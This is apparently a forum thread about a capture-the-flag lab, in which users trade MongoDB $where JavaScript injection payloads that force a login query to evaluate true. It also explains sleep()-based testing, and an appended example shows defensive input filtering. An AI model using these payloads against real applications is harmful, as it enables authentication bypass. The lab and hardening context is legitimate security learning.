Forum Discussion
Trick or Treat: Manor of Madness
- 2 months ago
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti
Sure, the query I used is
$where":"this.name == '' && this.incantation == '';1==1"
The aim was to discover you could use JavaScript injection to evaluate the query to true.
Hi Samh051,
This query worked for you in the last question?
- immervivesolver 23 days ago
Bronze III
{"$where":"this.name == 'admin'||'1'=='1'&& this.incantation == 'admin'||'1'=='1'"}
- PRABAKARANRAMAMURTHY 23 days ago
Bronze III
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}
- Samh051 23 days ago
Bronze III
It did. You would use sleep(x) just to test if the server executes the JavaScript. You would then try and evaluate the statement to true. The ; at the end is to complete the command and the 1=1 is there to make it true. Are you having problems with the command?
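The defensive counterpart to the payloads in this thread, as an added example that is not part of any post or of the lab's own code: a request handler should never hand the parsed request body to the database as the query document. The helper names `findOperatorKeys` and `buildSpellFilter` are hypothetical, and the sample request bodies are constructed; the field names `name` and `incantation` are taken from the thread.

```javascript
// Added example (not from the thread): hardening a lookup that takes
// `name` and `incantation` from a JSON request body.
// findOperatorKeys and buildSpellFilter are hypothetical helper names.

// Recursively collect keys that MongoDB would treat as operators ("$...")
// or as dotted paths, anywhere in a parsed JSON value.
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = path ? `${path}.${key}` : key;
    if (key.startsWith("$") || key.includes(".")) hits.push(here);
    hits.push(...findOperatorKeys(child, here));
  }
  return hits;
}

// Build the filter from scratch instead of passing the request body to find().
// Only plain strings are accepted, and they are wrapped in $eq so they are
// compared as data and never interpreted as a query document or JavaScript.
function buildSpellFilter(body) {
  const bad = findOperatorKeys(body);
  if (bad.length > 0) {
    return { ok: false, reason: `operator keys rejected: ${bad.join(", ")}` };
  }
  const { name, incantation } = body ?? {};
  if (typeof name !== "string" || typeof incantation !== "string") {
    return { ok: false, reason: "name and incantation must be strings" };
  }
  return { ok: true, filter: { name: { $eq: name }, incantation: { $eq: incantation } } };
}

// Constructed sample request bodies: one legitimate, three hostile.
const samples = [
  '{"name":"admin","incantation":"lumos"}',
  '{"$where":"this.name == \'admin\'"}',
  '{"name":{"$ne":null},"incantation":"x"}',
  '{"name":"admin\' || \'1\'==\'1","incantation":"x"}',
];
for (const raw of samples) {
  console.log(raw, "->", JSON.stringify(buildSpellFilter(JSON.parse(raw))));
}
```

The last sample is accepted on purpose: once the value is only ever a string operand of `$eq`, the quote characters are inert data that match no document. Where no feature needs `$where`, server-side JavaScript can also be turned off with `security.javascriptEnabled: false` in the mongod configuration.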